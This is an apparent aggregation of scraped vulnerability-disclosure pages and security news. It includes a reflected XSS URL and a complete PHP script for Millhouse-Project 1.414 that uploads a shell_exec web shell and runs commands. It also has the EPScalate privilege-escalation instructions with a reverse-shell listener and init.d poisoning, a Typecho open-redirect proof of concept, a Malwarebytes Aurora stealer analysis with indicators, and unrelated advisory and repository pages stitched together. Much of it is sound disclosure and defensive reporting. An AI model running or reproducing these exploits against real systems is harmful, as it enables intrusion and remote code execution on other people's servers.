Millhouse-Project version 1.414 suffers from a cross site scripting vulnerability.

Change Mirror Download

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - register - Reflected xssDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/?>POC:http://target/views/register.php?error=%3Cscript%3Ealert(%27rose1337%27)%3C/script%3E

Millhouse-Project 1.414 Cross Site Scripting

Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

Millhouse-Project 1.414 Shell Upload

Incorrect access control in Quick Heal Technologies Limited Seqrite Endpoint Security (EPS) all versions prior to v8.0 allows attackers to escalate privileges to root via supplying a crafted binary to the target system.

**EPScalate**

An elevation of privilege vulnerability in QuickHeal's Seqrite Enterprise Endpoint Security Solution (EPS).

poc.mp4**Vendor and Product Details**

*   **Vendor**: Quick Heal Technologies Limited
*   **Product**: Seqrite Endpoint Security (EPS)
*   **Product Homepage**: https://www.seqrite.com/endpoint-security/seqrite-endpoint-security
*   **Affected Versions**: Affects all versions prior to v8.0.

**Vulnerability Details**

Seqrite endpoint security with its default installation installs to /usr/lib/Seqrite/ with very weak directory and file permissions granting a local user full read/write permission to the contents of the directory. In addition, the installation procedure installs its startup scripts to /etc/init.d/ which are world writable. This enables any low-privilege user on the system to escalate privileges to root.

The exploit makes use of 2 different vulnerabilities introduced by the software to elevate privileges on the system. Firstly, the fact that the application uses scripts in /etc/init.d/ to start its scan processes which can be written to by any user. Secondly, the application makes use shared objects to dynamically load position-independent code (PIC) during runtime. As a matter of fact, all of the executable shared object files are world writable. Lastly, the application binaries used for the daemon process are world writable which basically means any non-privileged user could overwrite the scanner binaries with a reverse shell binary to execute arbitrary code as root.

**Exploit Usage**

The exploit is a simple Python file that aids in the exploitation of the vulnerability.

Steps:

1.  On the attacker machine, start a listener using netcat (nc -lvp <port>) or metasploit (multi/handler).
2.  Copy/download the epscalate.py and shellcode.c file onto the target system.
3.  Run the python file with proper arguments (python3 epscalate.py -H 192.168.0.103:9999 -I).
4.  Wait for the AV to reload / the system to reboot.
5.  The reverse connection to your listener can confirm code execution as root.

Exploit help:

$ python epscalate.py -h

    EPSCALATE - PoC for privesc in Seqrite EPS
                ~ 0xInfection

usage: epscalate.py -H <host>:<port> <technique\_flag>

options:
  -h, --help            show this help message and exit
  -H HOSTPORT, --hostport HOSTPORT
                        The IP and port of the listening attacker machine in format of <ip>:<port>
  -B, --daemon-binaries
                        Overwrite the main daemon binaries to escalate privileges.
  -I, --initd-scripts   Posion /etc/init.d/ bash startup scripts with a reverse shell to escalate privileges.

**Support**

The exploit has been tested on all Debian and Ubuntu-based variant operating systems.

**License & Credits**

The exploit code has been published under the Apache 2.0 License. The vulnerability has been disclosed to the vendor and has been remediated at the time of publishing the vulnerability.

Vulnerability and exploit credits: Pinaki Mondal (0xInfection).

CVE-2023-31497: GitHub - 0xInfection/EPScalate: Exploit for elevation of privilege vulnerability in QuickHeal's Seqrite EPS.

Progress Ipswitch MoveIT 1.1.11 was discovered to contain a cross-site scripting (XSS) vulenrability via the API authentication function.

noetic-devel

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**9** branches **69** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

 

ivatavuk and rhaschke Fix Jacobian calculation for planar joint (#3439)

67121a3

May 28, 2023

Fix Jacobian calculation for planar joint (#3439)

67121a3

**Git stats**

*   **7,879** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

.docker

Dockerfile: Update ci-shadow-fixed -> ci-testing

September 3, 2022 06:52

.github

CI: Bump mamba-org/provision-with-micromamba from 14 to 16 (#3438)

May 28, 2023 12:28

moveit

1.1.12

May 13, 2023 20:56

moveit\_commander

1.1.12

May 13, 2023 20:56

moveit\_core

Fix Jacobian calculation for planar joint (#3439)

May 28, 2023 13:04

moveit\_experimental

Fix (some) doxygen warnings (#3315)

January 25, 2023 12:03

moveit\_kinematics

1.1.12

May 13, 2023 20:56

moveit\_planners

1.1.12

May 13, 2023 20:56

moveit\_plugins

1.1.12

May 13, 2023 20:56

moveit\_ros

1.1.12

May 13, 2023 20:56

moveit\_runtime

1.1.12

May 13, 2023 20:56

moveit\_setup\_assistant

1.1.12

May 13, 2023 20:56

.clang-format

Tweak penalties

August 11, 2020 08:28

.clang-tidy

add clang-tidy check for bind()

April 2, 2022 22:48

.dockerignore

Explicitly list all package.xml to include

August 26, 2021 16:40

.gitignore

Python bindings for moveit\_core (#2547)

April 3, 2021 09:56

.pre-commit-config.yaml

pre-commit: Update black version

March 29, 2022 18:43

CODE\_OF\_CONDUCT.md

Fix formatting errors

March 25, 2021 22:40

CONTRIBUTING.md

Remove ! from MoveIt name (#1590)

August 2, 2019 12:42

LICENSE.txt

Add license file to root of project (#349)

November 14, 2016 10:30

MIGRATION.md

rename MGI::getJointNames() to getVariableNames()

February 20, 2023 14:08

README.md

version.h: automatically bump patch number for devel builds (#3211)

December 19, 2022 15:17

codecov.yaml

\[maint\] Remove patch status from codecov (#2306)

September 12, 2020 12:27

moveit.rosinstall

Update panda\_moveit\_config to noetic-devel in .rosinstall files

September 9, 2022 08:17

Branches Policy MoveIt Status Continuous Integration Licenses ROS Buildfarm Stargazers over time

**README.md**

The MoveIt Motion Planning Framework for ROS. For the ROS 2 repository see MoveIt 2.

_Easy-to-use open source robotics manipulation platform for developing commercial applications, prototyping designs, and benchmarking algorithms._

*   Overview of MoveIt
*   Installation Instructions
*   Documentation
*   Get Involved

**Branches Policy**

*   We develop latest features on master.
*   The *-devel branches correspond to released and stable versions of MoveIt for specific distributions of ROS. noetic-devel is synced to master currently.
*   Bug fixes occasionally get backported to these released versions of MoveIt.
*   To facilitate compile-time switching, the patch version of MOVEIT_VERSION of a development branch will be incremented by 1 w.r.t. the package.xml's version number.

**MoveIt Status****Continuous Integration**

service

Melodic

Master

GitHub

 

 

CodeCov

build farm

  

**Licenses**

**ROS Buildfarm**

MoveIt Package

Melodic Source

Melodic Debian

Noetic Source

Noetic Debian

**moveit**

moveit\_core

moveit\_kinematics

**moveit\_planners**

moveit\_planners\_ompl

moveit\_planners\_chomp

chomp\_motion\_planner

moveit\_chomp\_optimizer\_adapter

pilz\_industrial\_motion\_planner

pilz\_industrial\_motion\_planner\_testutils

**moveit\_plugins**

moveit\_fake\_controller\_manager

moveit\_simple\_controller\_manager

moveit\_ros\_control\_interface

**moveit\_ros**

moveit\_ros\_planning

moveit\_ros\_move\_group

moveit\_ros\_planning\_interface

moveit\_ros\_benchmarks

moveit\_ros\_perception

moveit\_ros\_occupancy\_map\_monitor

moveit\_ros\_manipulation

moveit\_ros\_robot\_interaction

moveit\_ros\_visualization

moveit\_ros\_warehouse

moveit\_servo

**moveit\_runtime**

moveit\_commander

moveit\_setup\_assistant

**moveit\_msgs**

geometric\_shapes

srdfdom

moveit\_visual\_tools

moveit\_tutorials

**Stargazers over time**

CVE-2023-30394: GitHub - ros-planning/moveit: The MoveIt motion planning framework

Debian Linux Security Advisory 5400-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, spoofing or permission request bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5400-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 10, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-32205 CVE-2023-32206 CVE-2023-32207 CVE-2023-32211                  CVE-2023-32212 CVE-2023-32213 CVE-2023-32215Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, spoofing or permission request bypass.For the stable distribution (bullseye), these problems have been fixed inversion 102.11.0esr-1~deb11u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRbxo4ACgkQEMKTtsN8TjZfmg/+MciUUKxioJ3j6reOVi77g1bU025eLGmPVBg9cCQdR2qom/PI65tKO6Oxy1KP4S630Tc8tn1P90asnZY/cnPuBHHpUdjdJO5VoLH4HSltykwyeQ2KOvkvgDNd3ItPySOOjAoIW4qMfCo096ZrRMo6sXUvz4IqUHyzFtip+aJDm3DLe3TGYKTh6Fu1pWFT6pcqbSBLWmAKI0/sVvdnQePRnSYaHR8deu0+/Ujju4ViqQTHb8dNhzPtG875lN+Shy2AWcKCe5bSQd6Rs0o+iraOt17oMZFvMRWQIBpEEOf1fyUVOjIVXyHSiP+wZVqA01mI1Mgk5yFx3BCa1zYilHlTK3Q4HIwU02AM6Lesn7jvYEpaI2X1zwHVWGka4vio+OSTmd7uk0Vl7lPiHSkcsKDK1CQW/IOMS5OPoZJ19BflOR4ZSVC6/BRsoOxGCyrnRFFOwuUvMej6KvHnwkQDYWzS34d+6jiKcz5ekXPxLafuxsQdIzPkJtSLUx/5+Z6mQHkLDyJa+jylj0cYVHnnkrj0/G5aW6Yvr4iSrJWCm/N6I4roShWaRwFNCdlD3bNCNqEZYofT4eIOKNANoovwG0XLixhYrQvfoS1I6oQ/xw8nBYJmK4OPo3AKRDxh7B8RnVr//MTeDPUbycZli+j6hWUNjFgfQVtc4eKdy9gFSLYj8NY==1YYS-----END PGP SIGNATURE-----

Debian Security Advisory 5400-1

Microsoft has rolled out Patch Tuesday updates for May 2023 to address 38 security flaws, including one zero-day bug that it said is being actively exploited in the wild.
Trend Micro's Zero Day Initiative (ZDI) said the volume is the lowest since August 2021, although it pointed out that "this number is expected to rise in the coming months."
Of the 38 vulnerabilities, six are rated Critical and

Microsoft has rolled out Patch Tuesday updates for May 2023 to address 38 security flaws, including one zero-day bug that it said is being actively exploited in the wild.

Trend Micro's Zero Day Initiative (ZDI) said the volume is the lowest since August 2021, although it pointed out that "this number is expected to rise in the coming months."

Of the 38 vulnerabilities, six are rated Critical and 32 are rated Important in severity. Eight of the flaws have been tagged with "Exploitation More Likely" assessment by Microsoft.

This is aside from 18 flaws – including 11 bugs since the start of May – the Windows maker resolved in its Chromium-based Edge browser following the release of April Patch Tuesday updates.

Topping the list is CVE-2023-29336 (CVSS score: 7.8), a privilege escalation flaw in Win32k that has come under active exploitation. It's not immediately clear how widespread the attacks are.

"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft said, crediting Avast researchers Jan Vojtěšek, Milánek, and Luigino Camastra for reporting the flaw.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog, urging organizations to apply vendor fixes by May 30, 2023.

Also of note are two publicly known flaws, one of which is a critical remote code execution flaw impacting Windows OLE (CVE-2023-29325, CVSS score: 8.1) that could be weaponized by an actor by sending a specially crafted email to the victim.

Microsoft, as mitigations, is recommending that users read email messages in plain text format to protect against this vulnerability.

The second publicly known vulnerability is CVE-2023-24932 (CVSS score: 6.7), a Secure Boot security feature bypass that's weaponized by the BlackLotus UEFI bootkit to exploit CVE-2022-21894 (aka Baton Drop), which was resolved in January 2022.

"This vulnerability allows an attacker to execute self-signed code at the Unified Extensible Firmware Interface (UEFI) level while Secure Boot is enabled," Microsoft said in a separate guidance.

"This is used by threat actors primarily as a persistence and defense evasion mechanism. Successful exploitation relies on the attacker having physical access or local admin privileges on the targeted device."

It's worth noting that the fix shipped by Microsoft is disabled by default and requires customers to manually apply the revocations, but not before updating all bootable media.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

"Once the mitigation for this issue is enabled on a device, meaning the revocations have been applied, it cannot be reverted if you continue to use Secure Boot on that device," Microsoft cautioned. "Even reformatting of the disk will not remove the revocations if they have already been applied."

The tech giant said it's taking a phased approach to completely plug the attack vector to avoid unintended disruption risks, an exercise that's expected to stretch until the first quarter of 2024.

"Modern UEFI-based Secure Boot schemes are extremely complicated to configure correctly and/or to reduce their attack surfaces meaningfully," firmware security firm Binarly noted earlier this March. "That being said, bootloader attacks are not likely to disappear anytime soon."

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Apache Projects
*   Apple
*   Aruba Networks
*   Cisco
*   Citrix
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   Hitachi Energy
*   HP
*   IBM
*   Intel
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   NVIDIA
*   Palo Alto Networks
*   Qualcomm
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SolarWinds
*   Synology
*   Veritas
*   VMware
*   Zoho, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft's May Patch Tuesday Fixes 38 Flaws, Including Active Zero-Day Bug

VideoLAN dav1d before 1.2.0 has a thread_task.c race condition that can lead to an application crash, related to dav1d_decode_frame_exit.

Skip to content

GitLab 

*   

Projects Groups Snippets

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    
*   Sign in
    

*   VideoLAN
*   dav1d
*   Tags
*   1.2.0

1.2.0 protected

**Jean-Baptiste Kempf**

@jbk

676a864a · News for 1.2.0 · May 02, 2023

Release 1.2.0

**Download source code**

zip tar.gz tar.bz2 tar

**Download artifacts****Previous Artifacts**

*   test-debian-avx512
*   test-win64
*   test-debian-ppc64le
*   test-debian-unaligned-stack
*   test-debian
*   test-debian32-asm
*   test-debian-asm

1.2.0 'Arctic Peregrine Falcon':

1.2.0 is a small release of dav1d, adding more SIMD, notably for
z1/z2/z3 on all platforms, and some itx optimizations.
It also brings fixes and improvements on props and T.35

This tag has no release notes.

VideoLAN code repository instance

CVE-2023-32570: 1.2.0 · Tags · VideoLAN / dav1d · GitLab

Categories: Threat Intelligence
Tags: malvertising

Tags:  Aurora stealer

Tags:  loader

Tags:  Amadey

Not all system updates mean well, and some will even trick you into installing malware.



(Read more...)




The post Fake system update drops Aurora stealer via Invalid Printer loader appeared first on Malwarebytes Labs.

Malvertising seems to be enjoying a renaissance as of late, whether it is from ads on search engine results pages or via popular websites. Because browsers are more secure today than they were 5 or 10 years ago, the attacks that we are seeing all involve some form of social engineering.

A threat actor is using malicious ads to redirect users to what looks like a Windows security update. The scheme is very well designed as it relies on the web browser to display a full screen animation that very much resembles what you'd expect from Microsoft.

The fake security update is using a newly identified loader that at the time of the campaign was oblivious to malware sandboxes and bypassed practically all antivirus engines. We wrote a tool to 'patch' this loader and identified its actual payload as Aurora stealer. In this blog post, we detail our findings and how this campaign is connected to other attacks.

**A convincing "system update"**

Windows users are quite familiar with system updates, often interrupting hours of work or popping up in the middle of an intense game. When that happens, they just want to install whatever needs to be installed and get on with their day.

A threat actor is buying popunder ads targeting adult traffic and tricking victims with what appears to a system security update.

_Figure 1: A fake system update hijacks the screen_

As convincing as it looks, what you see above is actually a browser window that is rendered in full screen. This becomes more obvious when downloading the update file named ChromeUpdate.exe.

Figure 2: The 'Chrome update' downloaded from the web browser

**Fully Undetectable (FUD) malware**

While the file name appears as ChromeUpdate.exe, it uses the Cyrillic alphabet such that certain characters look similar but are different on disk. Its hex representation is %D0%A1hr%D0%BEm%D0%B5U%D1%80d%D0%B0t%D0%B5.exe as can be seen in the image below:

Figure 3: Hex encoding and Cyrillic alphabet

When we first ran the sample into a sandbox, we could not see anything obvious or that it was even malicious. The file would simply run and exit quickly. Over a couple of weeks, we collected nine different samples that looked more or less the same.

We also noticed that the threat actor was uploading each of his new builds to VirusTotal, a service owned by Google, to check if they were being detected by antivirus engines. The first user to submit each new sample always uploaded them from Turkey (country code TR) and in many instances the file name looked like it had come fresh from the compiler (i.e. build1\_enc\_s.exe).

Figure 4: User submissions to VirusTotal

While VirusTotal is no replacement for a full endpoint security product, with its 70 AV engines it is usually a good indicator to quickly check if a file is malicious or not. For more than 2 weeks, the samples had 0 detection on VT and it wasn't until a blog post by Morphisec that detections started to appear. This new loader is called Invalid Printer and so far appears to have been used exclusively by this threat actor to bypass security products.

Figure 5: VirusTotal detections coincide with blog release

We actually stumbled upon Morphisec's blog thanks to Threatray which identified similarities with a file we submitted to their sandbox. The service's built-in OSINT identified similar samples and linked them with security articles. 

Figure 6: Threatray analysis page

**Patching the loader**

Invalid Printer performs a check on the computer's graphic card and specifically its vendor ID which it compares against known manufacturers such as AMD, NVidia. Virtual machines and sandboxes in general do not use real hardware and will fail to pass the check.

We were able to patch the samples we had collected and identify their payload. The patch consists of replacing the graphics card check with a random number and always returning true, therefore allowing the file to run in any sandbox.

Figure 7: Python script to patch loader

The automated malware unpacking service from OpenAnalysis UnpacMe now supports properly unpacking samples using the Invalid Printer loader. It allowed us to determine what malware family is being distributed as well as indicators of compromise. For example, one of our samples (31c425510fe7f353002b7eb9d101408dde0065b160b089095a2178d1904f3434) has the same command and control server (94.142.138\[.\]218) as one mentioned in Morphisec's blog.

Figure 8: UnpacMe results page

In this specific malvertising campaign, the payload used was the Aurora Stealer, a popular piece of malware that is designed to harvest credentials from systems.

**Campaign stats**

The threat actor is using a panel to track high level stats about visitors to the fake system update web page. Based on the numbers from this panel, there were 27,146 potential unique victims and 585 of them downloaded the malware during the past 49 days.

Figure 9: Panel showing browser visits and downloads

Figure 10: Browser user-agents, IP addresses and geolocation

**War and Russia references**

We believe there is a single threat actor behind this malvertising campaign and others such as the one Morphisec uncovered. The malware author seems to take a very high interest in creating FUD malware and constantly uploads it to VirusTotal to verify, always using the same submitter profile.

We couldn't help but notice a possible reference to the war in Ukraine left within the fake Chrome Update page and commented out:

Figure 11: Commented HTML code

Some of the websites belonging to this threat actor were not loading malware but instead had a single YouTube video promoting the cities and landscapes of Russia:

Figure 12: YouTube video about Russia in 12K HDR 

Additionally, we found some connections with tech support scams and even an Amadey panel that also appears to belong to the threat actor.

**Protection**

Malwarebytes already protected users from this malvertising campaign by blocking the malicious ads involved. We detect the payloads as Spyware.Aurora.

Special thanks to Roberto Santos for help with the sample and binary patching.

**Indicators of Compromise**

**Malvertising gate**

qqtube\[.\]ru194.58.112\[.\]173

**Fake system update page**

activessd\[.\]ru  
chistauyavoda\[.\]ru  
xxxxxxxxxxxxxxx\[.\]ru  
activehdd\[.\]ru  
oled8kultra\[.\]ru  
xhamster-18\[.\]ru  
oled8kultra\[.\]site  
activessd6\[.\]ru  
activedebian\[.\]ru  
shluhapizdec\[.\]ru  
04042023\[.\]ru  
clickaineasdfer\[.\]ru  
moskovpizda\[.\]ru  
pochelvpizdy\[.\]ru  
evatds\[.\]ru  
click7adilla\[.\]ru  
grhfgetraeg6yrt\[.\]site  
92.53.96\[.\]119

**Invalid Printer samples**

d29f4ffcc9e2164800dcf5605668bdd4298bcd6e75b58bed9c42196b4225d590  
5a07e02aec263f0c3e3a958f2b3c3d65a55240e5da30bbe77c60dba49d953b2c  
193cec31ea298103fe55164ff6270a2adf70248b3a4d05127414d6981f72cef4  
dac1bd40799564288bf55874543196c4ef6265d89e3228864be4d475258b9062  
40b8acc3560ac0e1825755b3b05ef01c46bdbd184f35a15d0dc84ab44fa99061  
31c425510fe7f353002b7eb9d101408dde0065b160b089095a2178d1904f3434  
398faa3aab8cce7a12e3e3f698bc29514c5b10a4369cc386421913e31f95cfdc  
93b9199ca9e1ee0afbe7cf6acccedd39f37f2dd603a3b1ea05084ab29ff79df7  
4c80bd604ae430864c507d723c6a8c66f4f5e9ba246983c833870d05219bd3e5

**Aurora Stealer C2**

103.195.103\[.\]54:443  
94.142.138\[.\]218:4561

**Amadey Stealer panel**

193.233.20\[.\]29/games/category/Login.php

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Fake system update drops Aurora stealer via Invalid Printer loader

Open redirect vulnerability in typecho 1.1-17.10.30-release via the referer parameter to Login.php.

**1\. 该问题的重现步骤是什么？**

Typecho latest version url jump vulnerability after login  
code:

    admin > Login.php
    public function action()
    {
        // protect
        $this->security->protect();
    
        /** 如果已经登录 */
        if ($this->user->hasLogin()) {
            /** 直接返回 */
            $this->response->redirect($this->options->index);
    

Typecho first determines whether the user has logged in. If it has already logged in, it directly calls the redirect () function to redirect to the home page. This jump is mainly used to determine the user's status.  
typecho首先判断用户是否已经登录，如果已经登录，则直接调用redirect()函数重定向至首页，这个跳转主要用于判断用户的状态。

    admin > Login.php
    if (NULL != $this->request->referer) {
        $this->response->redirect($this->request->referer);
    } else if (!$this->user->pass('contributor', true)) {
        /** 不允许普通用户直接跳转后台 */
        $this->response->redirect($this->options->profileUrl);
    } else {
        $this->response->redirect($this->options->adminUrl);
    }
    

If there is no login, first verify whether the user's identity is correct, if the address of the referer is not empty, then call the redirect () function to redirect through the referer parameter, the referer parameter can be controlled  
如果没有登录，则首先校验用户的身份是否正确，如果referer的地址不为空，则调用redirect()函数通过referer的参数进行重定向，referer参数可控

Follow up: redirect () function, which defines two parameters, of which the default is not permanent redirect  
跟进：redirect()函数，该函数定义了两个参数，其中默认不为永久重定向

    // Response.php 
     public function redirect($location, $isPermanently = false)
    {
        /** Typecho_Common */
        $location = Typecho_Common::safeUrl($location);
    
        if ($isPermanently) {
            header('Location: ' . $location, false, 301);
            exit;
        } else {
            header('Location: ' . $location, false, 302);
            exit;
        }
    }
    

After the referer's address is passed to the redirect () function, it will first call Typecho\_Common> static method safeUrl () to check the url, and finally determine whether to use permanent or temporary redirection according to the status of isPermanently  
referer的地址传递到redirect()函数中以后，首先会调用Typecho\_Common > 静态方法safeUrl()对url进行检查，最后根据isPermanently的状态，判断使用永久重定向还是临时重定向

Follow up: /var/Typecho/Common.php  
跟进：/var/Typecho/Common.php

    public static function safeUrl($url)
    {
        //~ 针对location的xss过滤, 因为其特殊性无法使用removeXSS函数
        //~ fix issue 66
        $params = parse_url(str_replace(array("\r", "\n", "\t", ' '), '', $url));
    
        /** 禁止非法的协议跳转 */
        if (isset($params['scheme'])) {
            if (!in_array($params['scheme'], array('http', 'https'))) {
                return '/';
            }
        }
    
        /** 过滤解析串 */
        $params = array_map(array('Typecho_Common', '__removeUrlXss'), $params);
        return self::buildUrl($params);
    }
    

Use safe\_rl to replace string in str\_replace (), replace all characters in array () list with empty string, and then parse the address of referer by calling parse\_url () function: scheme, host, port, path, etc Array to $ params variable  
Next, determine whether the protocol name is empty. If the source address is not the URL of the http protocol and https protocol, return the "/" path directly  
safeUrl内使用str\_replace()进行字符串替换，将array()列表中的所有字符替换为空字符串，然后通过调用parse\_url()函数对referer的地址进行解析：scheme，host，port，path等返回一个数组到$params变量  
接着判断，协议名称是否为空，如果来源地址不是http协议与https协议的url则直接返回 “/”路径

    /**
     * 根据parse_url的结果重新组合url
     *
     * @access public
     * @param array $params 解析后的参数
     * @return string
     */
    public static function buildUrl($params)
    {
        return (isset($params['scheme']) ? $params['scheme'] . '://' : NULL)  // 如果已经设置了协议名称，则默认在协议后面拼接''://'，否则为空
        . (isset($params['user']) ? $params['user'] . (isset($params['pass']) ? ':' . $params['pass'] : NULL) . '@' : NULL)
        . (isset($params['host']) ? $params['host'] : NULL) // 如果已经设置了主机名，则使用host参数
        . (isset($params['port']) ? ':' . $params['port'] : NULL) // 如果已经设置了端口，则默认在端口后面拼接":"，否则为空
        . (isset($params['path']) ? $params['path'] : NULL) // 如果已经设置了路径，则使用path参数
        . (isset($params['query']) ? '?' . $params['query'] : NULL) // 如果已经设置了查询，则默认在query前拼接'？' 
        . (isset($params['fragment']) ? '#' . $params['fragment'] : NULL); 如果已经设置了分段，则默认在分段前拼接''#' 
    }
    

The formatted URLs are recombined and finally returned  
格式化以后的url进行重新组合，最后返回

    /**
     * 将url中的非法xss去掉时的数组回调过滤函数
     *
     * @access private
     * @param string $string 需要过滤的字符串
     * @return string
     */
    public static function __removeUrlXss($string)
    {
        $string = str_replace(array('%0d', '%0a'), '', strip_tags($string)); // 使用strip_tags()函数，强制过滤html代码，然后使用str_replace()函数将%0d,%0a（回车，换行）字符替换为空
        return preg_replace(array(
            "/$\s*(\"|')/i",           //函数开头
            "/(\"|')\s*$/i",           //函数结尾
        ), '', $string);
    }
    

poc:

    http://127.0.0.1/admin/login.php?referer=http://www.baidu.com
    

登录前：  
  
登录后跳转：  

response：

    HTTP/1.1 302 Found
    Date: Wed, 29 Apr 2020 07:37:06 GMT
    Server: Apache/2.4.41 (Debian)
    Set-Cookie: 122609301a375f23d5f0237df98400e5__typecho_uid=1; path=/
    Set-Cookie: 122609301a375f23d5f0237df98400e5__typecho_authCode=%24T%24VThLGyoLF07ae80963105613a00721934cce56d0a; path=/
    Location: http://www.baidu.com
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
    

**2\. 你期待的结果是什么？实际看到的又是什么？**

1.typecho首先判断用户登录状态  
2.如果已经登录则返回主页  
3.如果没有登录则先判断用户帐号密码是否正确，然后判断referer的来源是否为空  
4.如果不为空则调用redirect()函数进行重定向，location参数可控，即用户的referer的请求来源，恶意的攻击者可利用登录后的重定向将用户引诱至一个恶意的钓鱼页面。并且可以通过注册相似域名提高信任度，只需要将注册好的域名安装typecho，将用户重定向至自己本域的登录地址，然后通过查看本地的登录日志即可获取其他管理用户的帐号密码。  
5.rediect() > Typecho\_Common::safeUrl()函数对referer的参数进行过滤及校验协议是否为http/https  
6.rediect() > self::buildUrl()函数根据parse\_url的结果重新组合url  
7.redirect()根据isPermanently参数进行301/302跳转

修复方案：  
1.校验用户登录以后的referer地址为本域  
2.并且只允许本域内进行跳转

**3\. 问题出现的环境**

*   操作系统版本：Linux kali 5.3.0-kali2-amd64 70,能整一个 todolist 么？ #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86\_64 GNU/Linux
*   Apache/NGINX 版本：Server version: Apache/2.4.41 (Debian)，Server built: 2019-08-14T04:42:29
*   数据库版本：mariadb Ver 15.1 Distrib 10.3.20-MariaDB, for debian-linux-gnu (x86\_64) using readline 5.2
*   PHP 版本：PHP 7.3.10-1+b1 (cli) (built: Oct 13 2019 23:50:57) ( NTS )  
    Copyright (c) 1997-2018 The PHP Group  
    Zend Engine v3.3.10, Copyright (c) 1998-2018 Zend Technologies  
    with Zend OPcache v7.3.10-1+b1, Copyright (c) 1999-2018, by Zend Technologies
*   Typecho 版本：1.1-17.10.30-release
*   浏览器版本：Chromium 81.0.4044.92 built on Debian bullseye/sid, running on Debian kali-rolling  
    \[//\]: # (如有图片请附上截图)

CVE-2020-21038: typecho登录后的url重定向漏洞 | Typecho latest version url jump vulnerability after login · Issue #952 · typecho/typecho

OS Command Injection in GitHub repository sbs20/scanservjs prior to v2.27.0.



**Description**

